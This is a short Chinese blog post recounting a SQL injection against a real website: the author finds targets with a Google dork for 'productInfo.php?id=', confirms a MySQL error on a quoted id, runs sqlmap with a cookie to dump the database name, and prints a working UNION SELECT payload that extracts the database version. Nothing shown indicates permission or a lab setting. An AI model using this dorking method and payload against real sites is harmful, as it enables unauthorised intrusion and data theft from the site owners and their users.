Sqlmap注入实战记录

一、在Google浏览器用inurl搜索语法寻找目标

inrul:productInfo.php?id=

二、随便点开几个连接，目标出现了

给id参数加单引号'，页面不正常了，在上方还出现了查询报错的相关信息，相关信息还给出了数据库是MySQL。

三、使用sqlmap进行扫描：指定的数据库类型为MySQL，并且携带Cookie值

经过小小的等待，有收获了，爆出了数据库名。

根据sqlmap的给出paylaod可以进行SQL注入，改变concat函数的参数就可以了手工利用了，如下payload可以爆出数据库版本：

-8444%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(VERSION(),0x41756942736671524472427366534f54644f42527170684356664c43775571656253554978616557,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL--%20-

concat函数的三个参数都是可以回显利用的。

到这里SQL注入已经完成了，点到为止。

若有错误，欢迎指正！o(￣▽￣)ブ

posted @ 2024-04-07 18:01 smileleooo 阅读(64) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Loading

记录&分享 Security

Sqlmap注入实战记录

公告